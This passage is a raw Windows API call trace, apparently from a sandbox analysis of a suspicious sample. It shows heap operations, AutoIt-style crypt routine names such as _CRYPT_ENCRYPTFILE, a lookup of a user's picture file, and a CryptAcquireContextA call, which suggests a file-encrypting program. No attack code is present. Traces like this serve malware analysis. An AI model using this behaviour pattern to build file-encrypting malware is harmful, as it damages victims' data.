dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0092.432] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.433] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0092.433] CloseHandle (hObject=0x258) returned 1 [0092.433] FreeLibrary (hLibModule=0x772d0000) returned 1 [0092.433] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0092.433] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7mFkSCM1jm586Ad_.png", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8926ac0, ftCreationTime.dwHighDateTime=0x1d5f077, ftLastAccessTime.dwLowDateTime=0x260c180, ftLastAccessTime.dwHighDateTime=0x1d5e6a7, ftLastWriteTime.dwLowDateTime=0x260c180, ftLastWriteTime.dwHighDateTime=0x1d5e6a7, nFileSizeHigh=0x0, nFileSizeLow=0x6f4b, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="7mFkSCM1jm586Ad_.png", cAlternateFileName="7MFKSC~1.PNG")) returned 0x41ac640 [0092.433] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0092.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0092.433] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0092.434] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca718 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0092.434] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0092.434] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0092.434] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0092.435] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0092.435] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0092.436] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0092.436] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca508 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0092.437] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0092.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.438] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0092.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0092.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15) returned 0x1796e48 [0092.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e48, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.440] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0092.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0092.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0092.489] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0092.490] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0092.490] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0092.490] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25a0 